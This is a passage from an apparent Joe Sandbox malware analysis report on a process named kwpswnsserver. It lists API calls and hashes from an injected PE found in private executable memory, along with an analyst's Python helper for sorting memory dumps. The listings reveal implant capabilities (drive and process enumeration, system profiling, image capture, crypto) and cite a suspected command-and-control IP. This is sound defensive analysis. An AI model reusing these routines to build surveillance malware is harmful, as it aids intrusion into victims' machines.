                                                                  • Associated: 00000003.00000002.3559071612.00000000004E4000.00000008.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000003.00000002.3559112097.00000000004E6000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000003.00000002.3559153425.00000000004E8000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4a0000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValue$BootstrapCloseCommandLine$ArgvCurrentDirectoryInitialize2.Shutdown.
                                                                  • String ID: Run over, res is:$Run start, cmd is:$WinMain$\office6$check_mode$checkrt$cmd=$pull_notification$register_mode$runtime not support$unregister_mode$wake_mode
                                                                  • API String ID: 1605902879-3153828214
                                                                  • Opcode ID: a4a4d6b0e3efc47983e93d25bc42c1b53f60b9cc4d3cad98e774219a28c0cecb
                                                                  • Instruction ID: 45e265d349df53a2215562e3f2a50aa64573ddfe6fd22e32da945219a8b01b4d
                                                                  • Opcode Fuzzy Hash: a4a4d6b0e3efc47983e93d25bc42c1b53f60b9cc4d3cad98e774219a28c0cecb
                                                                  • Instruction Fuzzy Hash: 184215312043409BE718CF28C995B6FB7E2ABD6304F608A1EF495872D5EB7CD944CB5A
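The Memory Dump Source names are worth reading as data, not just as file names. The WinMain listing above comes from the module at 004A0000, whose dumps carry protection 00000020 (PAGE_EXECUTE_READ) and type 01000000 (MEM_IMAGE): a normally mapped executable, and the registry paths it reads (Software\kingsoft\Office\6.0\...\messagepushcenter\wns) together with the snapshot file name kwpswnsserver identify it as the WPS Office push-notification component. The earlier listings (the one with the 118.107.44.219 strings, the screenshot routine, the drive enumeration) all come from 04270000, whose dumps carry 00000040 (PAGE_EXECUTE_READWRITE) and 00020000 (MEM_PRIVATE) and are marked "based on PE: true": a PE sitting in private, writable, executable memory, which no legitimately loaded image ever is. The decoder below is an added example, not Joe Sandbox tooling; the PAGE_* and MEM_* values are the documented Windows constants, but the field layout of the .sdmp name (process index, dump index, sequence, base, protection, an undecoded field, type, an undecoded field) is an assumption inferred from the names on this page, and the sample lines are a constructed subset of the report's own Memory Dump Source entries.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Documented Windows constants (MEMORY_BASIC_INFORMATION.Protect and .Type).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_AND_WRITE = {0x40, 0x80}

# Assumed .sdmp name layout, inferred from the names on this page (not documented here):
# <process index>.<dump index>.<sequence>.<base>.<protect>.<field 5>.<type>.<field 7>.sdmp
# Fields 5 and 7 are kept raw because their meaning is not established.
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<kind>Source File|Associated):\s*(?P<name>\S+?\.sdmp)"
    r"(?:.*based on PE:\s*(?P<pe>true|false))?"
)

# Constructed sample: Memory Dump Source lines copied from this report.
SAMPLE_SOURCES = """\
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
• Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmp
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
"""


@dataclass
class Region:
    process_index: int
    dump_index: int
    base: int
    protect: int
    mem_type: int
    raw_fields: tuple          # (field 5, field 7), undecoded
    pe: Optional[bool] = None  # the report's "based on PE" flag, when the line states one

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"{self.protect:#x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"{self.mem_type:#x}")

    @property
    def private_writable_exec(self) -> bool:
        """Private memory that is both writable and executable: unpacked or injected code, never a loaded image."""
        return self.mem_type == 0x20000 and self.protect in EXEC_AND_WRITE


def parse_dump_name(name: str, pe: Optional[bool] = None) -> Region:
    m = DUMP_RE.search(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return Region(int(m["proc"], 16), int(m["dump"], 16), int(m["base"], 16),
                  int(m["protect"], 16), int(m["type"], 16), (m["f5"], m["f7"]), pe)


def parse_sources(text: str) -> List[Region]:
    """Read Source File / Associated lines; only Source File lines carry the PE flag."""
    regions = []
    for line in text.splitlines():
        m = SOURCE_RE.match(line)
        if m:
            pe = None if m["pe"] is None else m["pe"] == "true"
            regions.append(parse_dump_name(m["name"], pe))
    return regions


def flag_regions(regions: List[Region]) -> List[Region]:
    """Private RWX regions, i.e. the dumps to pull first; r.pe says whether a PE header was seen there."""
    return [r for r in regions if r.private_writable_exec]


def describe(r: Region) -> str:
    pe = {True: "PE", False: "no PE", None: "PE?"}[r.pe]
    return f"{r.base:#010x} {r.protect_name:<24} {r.type_name:<12} {pe}"
```

`flag_regions(parse_sources(SAMPLE_SOURCES))` returns the two 04270000/042A4000 dumps and nothing from 004A0000 or 6C850000, which is the triage order an analyst wants: carve the private RWX PE first, then check whether the image-backed module at 6C850000 (the one with CryptAcquireContextW and CryptImportKey below) is the loader that wrote it.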
                                                                  APIs
                                                                  • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 04278132
                                                                  • lstrcmpiW.KERNEL32(?,A:\), ref: 04278166
                                                                  • lstrcmpiW.KERNEL32(?,B:\), ref: 04278176
                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 042781A6
                                                                  • lstrlenW.KERNEL32(?), ref: 042781B7
                                                                  • __wcsnicmp.LIBCMT ref: 042781CE
                                                                  • lstrcpyW.KERNEL32(00000AD4,?), ref: 04278204
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 04278228
                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 04278233
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                  • String ID: A:\$B:\
                                                                  • API String ID: 950920757-1009255891
                                                                  • Opcode ID: cfe80d7106e1cad5c982da9071dda78b94933ce3908ceb48981368e3d75b7ea5
                                                                  • Instruction ID: e91e0b5ca41ba039891b2fe3d985cb94152510e25474324b1ed33e9e680c3e5f
                                                                  • Opcode Fuzzy Hash: cfe80d7106e1cad5c982da9071dda78b94933ce3908ceb48981368e3d75b7ea5
                                                                  • Instruction Fuzzy Hash: 9441AB71B11219EBDB20DF65DD48AEEB3B8EF44710F0045D9DA09A3140EF74AE45CBA4
                                                                  APIs
                                                                  • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 04276C8B
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 04276CAA
                                                                  • _memset.LIBCMT ref: 04276CE1
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 04276CF4
                                                                  • swprintf.LIBCMT ref: 04276D39
                                                                  • swprintf.LIBCMT ref: 04276D4C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                  • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                  • API String ID: 3202570353-3501811827
                                                                  • Opcode ID: 7b1ff638f287d95c15c1b926f07ab727defc875235da0c2325618d1210eb3c92
                                                                  • Instruction ID: f7ebe7a4036cd5b5d15a2751e905b5a489bbca073e370b66581af079a0d64f17
                                                                  • Opcode Fuzzy Hash: 7b1ff638f287d95c15c1b926f07ab727defc875235da0c2325618d1210eb3c92
                                                                  • Instruction Fuzzy Hash: CB313EB2E1021CABDB14CFE9DC45BEEB7B9FB48700F50421DE91AA7241EA746D45CB90
                                                                  APIs
                                                                  • CreateDXGIFactory.DXGI(0429579C,?,5EF26BF0,74DEDF80,00000000,75BF73E0), ref: 04276F4A
                                                                  • swprintf.LIBCMT ref: 0427711E
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 042771C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                  • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                  • API String ID: 3803070356-257307503
                                                                  • Opcode ID: 4875b63688032a6a54f740ea0ae11c72ec41c29b163a84073ecbf54e2997fddb
                                                                  • Instruction ID: bbf563e33cf11b8dbfd1d3d7fbe6151d58489df8daf2f0d35a1e3fe75dab0169
                                                                  • Opcode Fuzzy Hash: 4875b63688032a6a54f740ea0ae11c72ec41c29b163a84073ecbf54e2997fddb
                                                                  • Instruction Fuzzy Hash: 7CE18571B112259FDF24CE64CC90BEEB3B5AB85700F1445E9E91AE7284D770BE818F91
                                                                  APIs
                                                                  • CryptAcquireContextW.ADVAPI32 ref: 6C86012A
                                                                  • CryptCreateHash.ADVAPI32 ref: 6C8601D4
                                                                    • Part of subcall function 6C9C21A1: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C89D2F4,FFFFFFFF,-00000001,?,?,6C89D2F4,?,6CA3FDBC,?), ref: 6C9C2202
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$AcquireContextCreateExceptionHashRaise
                                                                  • String ID:
                                                                  • API String ID: 333276693-0
                                                                  • Opcode ID: 370490bb4285b74862e1b999532ca28eaf533dbb987cce3f3277b70ba3d23fc8
                                                                  • Instruction ID: 37bbbb3fd9373b2ac72052825beddbc7e664f4bd3ddd7f52241058074dcb2c08
                                                                  • Opcode Fuzzy Hash: 370490bb4285b74862e1b999532ca28eaf533dbb987cce3f3277b70ba3d23fc8
                                                                  • Instruction Fuzzy Hash: D93211B5904358CFDB24EF68DA557DDBBB0BF49304F0085A9D80997750DB30AA48CF96
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0427607C
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04276088
                                                                  • Process32FirstW.KERNEL32(00000000,00000000), ref: 042760B9
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0427610F
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 04276116
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                  • String ID:
                                                                  • API String ID: 2526126748-0
                                                                  • Opcode ID: 149090585ffad8168d8fe05f956de71b5dcac52ecf793c16cddbb2f0e09cef9e
                                                                  • Instruction ID: e3a328ffccf3898e68492ed24d572a8bb5d58236a9216ad1e60f5eafb8975e52
                                                                  • Opcode Fuzzy Hash: 149090585ffad8168d8fe05f956de71b5dcac52ecf793c16cddbb2f0e09cef9e
                                                                  • Instruction Fuzzy Hash: 0221B731B25115ABDB20EF68EC59BEA7365FF15324F004699DD0997281EF35AE10C660
                                                                  APIs
                                                                    • Part of subcall function 6C85FDE0: CryptStringToBinaryA.CRYPT32 ref: 6C85FE60
                                                                    • Part of subcall function 6C85FDE0: CryptStringToBinaryA.CRYPT32 ref: 6C85FF07
                                                                  • CryptAcquireContextW.ADVAPI32 ref: 6C861349
                                                                  • CryptImportKey.ADVAPI32 ref: 6C861417
                                                                  • CryptSetKeyParam.ADVAPI32 ref: 6C8614A2
                                                                  • CryptSetKeyParam.ADVAPI32 ref: 6C861549
                                                                    • Part of subcall function 6C9C21A1: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C89D2F4,FFFFFFFF,-00000001,?,?,6C89D2F4,?,6CA3FDBC,?), ref: 6C9C2202
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$BinaryParamString$AcquireContextExceptionImportRaise
                                                                  • String ID:
                                                                  • API String ID: 2873263705-0
                                                                  • Opcode ID: c8b280bd11aed5df6fba9d4ee3a1975e5376f0b7700b53c295a7d9f2d9880859
                                                                  • Instruction ID: 63077be3662ca17d56bf44288118608eccb8e1e25d2ba008de984ed626f1d874
                                                                  • Opcode Fuzzy Hash: c8b280bd11aed5df6fba9d4ee3a1975e5376f0b7700b53c295a7d9f2d9880859
                                                                  • Instruction Fuzzy Hash: 92121DB0A143588FDB24DF68CA557DDBBF0BF49304F0089A9D449A7B50DB749A88CF92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Time_memmovetime
                                                                  • String ID:
                                                                  • API String ID: 1463837790-0
                                                                  • Opcode ID: d68d357364c59024fa4cd1d0d78284c097a6fb765743c5a483af3955824e31ac
                                                                  • Instruction ID: 84e3945d28da1cd4c8458661703599577f125be449a576e34cc3987a2a391644
                                                                  • Opcode Fuzzy Hash: d68d357364c59024fa4cd1d0d78284c097a6fb765743c5a483af3955824e31ac
                                                                  • Instruction Fuzzy Hash: 9451CF72720202AFD725DFA9C8D0A6AB7A5BF84214714866CED19CB701EB31F851DB90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C89E79C
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 6C89E7BC
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E818
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E836
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E854
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E872
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E890
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E8AE
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E8CC
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E8EA
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E908
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E926
                                                                  • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6C89E95E
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6C89E9B3
                                                                  • EnumFontFamiliesW.GDI32(?,00000000,6C89F43F,Segoe UI), ref: 6C89E9DA
                                                                  • lstrcpyW.KERNEL32(?,Segoe UI), ref: 6C89E9ED
                                                                  • EnumFontFamiliesW.GDI32(?,00000000,6C89F43F,Tahoma), ref: 6C89EA0B
                                                                  • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6C89EA25
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EA2F
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EA77
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EAB6
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EAE2
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EB03
                                                                  • GetSystemMetrics.USER32(00000048), ref: 6C89EB22
                                                                  • lstrcpyW.KERNEL32(?,Marlett), ref: 6C89EB35
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EB3F
                                                                  • GetStockObject.GDI32(00000011), ref: 6C89EB6B
                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C89EB86
                                                                  • lstrcpyW.KERNEL32(?,Arial), ref: 6C89EBC7
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EBD1
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EBEA
                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 6C89EC08
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EC16
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EC37
                                                                    • Part of subcall function 6C89F284: __EH_prolog3_GS.LIBCMT ref: 6C89F28B
                                                                    • Part of subcall function 6C89F284: GetTextMetricsW.GDI32(?,?), ref: 6C89F2C0
                                                                    • Part of subcall function 6C89F284: GetTextMetricsW.GDI32(?,?), ref: 6C89F300
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
                                                                  • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                  • API String ID: 2837096512-1395034203
                                                                  • Opcode ID: 591e504f400c0d64b4d5101e283c2027d13173182ce43dd487dd54b88e438ea0
                                                                  • Instruction ID: 393259d328a85fa3c775e926b526e430ce789f6b906a5fccb42511594fd78367
                                                                  • Opcode Fuzzy Hash: 591e504f400c0d64b4d5101e283c2027d13173182ce43dd487dd54b88e438ea0
                                                                  • Instruction Fuzzy Hash: 76E1A271A003599FDF25DBB4CE58BDDBBB8BF05308F108969A01AE7680DB74A949CF50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89E37B
                                                                  • GetSysColor.USER32(00000016), ref: 6C89E384
                                                                  • GetSysColor.USER32(0000000F), ref: 6C89E397
                                                                  • GetSysColor.USER32(00000015), ref: 6C89E3AE
                                                                  • GetSysColor.USER32(0000000F), ref: 6C89E3BA
                                                                  • GetDeviceCaps.GDI32(?,0000000C), ref: 6C89E3E2
                                                                  • GetSysColor.USER32(0000000F), ref: 6C89E3F0
                                                                  • GetSysColor.USER32(00000010), ref: 6C89E3FE
                                                                  • GetSysColor.USER32(00000015), ref: 6C89E40C
                                                                  • GetSysColor.USER32(00000016), ref: 6C89E41A
                                                                  • GetSysColor.USER32(00000014), ref: 6C89E428
                                                                  • GetSysColor.USER32(00000012), ref: 6C89E436
                                                                  • GetSysColor.USER32(00000011), ref: 6C89E444
                                                                  • GetSysColor.USER32(00000006), ref: 6C89E44F
                                                                  • GetSysColor.USER32(0000000D), ref: 6C89E45A
                                                                  • GetSysColor.USER32(0000000E), ref: 6C89E465
                                                                  • GetSysColor.USER32(00000005), ref: 6C89E470
                                                                  • GetSysColor.USER32(00000008), ref: 6C89E47E
                                                                  • GetSysColor.USER32(00000009), ref: 6C89E489
                                                                  • GetSysColor.USER32(00000007), ref: 6C89E494
                                                                  • GetSysColor.USER32(00000002), ref: 6C89E49F
                                                                  • GetSysColor.USER32(00000003), ref: 6C89E4AA
                                                                  • GetSysColor.USER32(0000001B), ref: 6C89E4B8
                                                                  • GetSysColor.USER32(0000001C), ref: 6C89E4C6
                                                                  • GetSysColor.USER32(0000000A), ref: 6C89E4D4
                                                                  • GetSysColor.USER32(0000000B), ref: 6C89E4E2
                                                                  • GetSysColor.USER32(00000013), ref: 6C89E4F0
                                                                  • GetSysColor.USER32(0000001A), ref: 6C89E519
                                                                  • GetSysColorBrush.USER32(00000010), ref: 6C89E52A
                                                                  • GetSysColorBrush.USER32(00000014), ref: 6C89E53D
                                                                  • GetSysColorBrush.USER32(00000005), ref: 6C89E550
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E571
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E58F
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E5AD
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E5CE
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E5EC
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E60A
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E628
                                                                  • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C89E64E
                                                                  • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C89E672
                                                                  • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C89E696
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E714
                                                                  • CreatePatternBrush.GDI32(00000000), ref: 6C89E752
                                                                    • Part of subcall function 6C88315A: DeleteObject.GDI32(00000000), ref: 6C883169
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                                                  • String ID:
                                                                  • API String ID: 3754413814-0
                                                                  • Opcode ID: 926ecd4c5b5eac795c8323e0adacec8ed19504f018b0a6f37d8276f492f4dca5
                                                                  • Instruction ID: 19d63ce017235c68446f8cb69f06d8d828ba8759ab0b5ae7e542226da14a1910
                                                                  • Opcode Fuzzy Hash: 926ecd4c5b5eac795c8323e0adacec8ed19504f018b0a6f37d8276f492f4dca5
                                                                  • Instruction Fuzzy Hash: 9EC1A171B00722AFDB29AF788D58799BB74BF05B09F008625E219D7AC0DB74A915CFD0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279E7B
                                                                  • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279EFC
                                                                  • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279F24
                                                                  • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279F7F
                                                                  • _malloc.LIBCMT ref: 04279FC0
                                                                    • Part of subcall function 0427F673: __FF_MSGBANNER.LIBCMT ref: 0427F68C
                                                                    • Part of subcall function 0427F673: __NMSG_WRITE.LIBCMT ref: 0427F693
                                                                    • Part of subcall function 0427F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76), ref: 0427F6B8
                                                                  • _free.LIBCMT ref: 0427A000
                                                                  • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0427A028
                                                                  • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0427A0B7
                                                                  • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0427A112
                                                                  • _free.LIBCMT ref: 0427A134
                                                                  • _memcpy_s.LIBCMT ref: 0427A183
                                                                  • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0427A1D0
                                                                  • GdipCreateBitmapFromScan0.GDIPLUS(?,?,04295A78,00022009,?,00000000,?,00000000), ref: 0427A22C
                                                                  • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0427A24C
                                                                  • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0427A267
                                                                  • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0427A274
                                                                  • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0427A27B
                                                                  • _free.LIBCMT ref: 0427A296
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
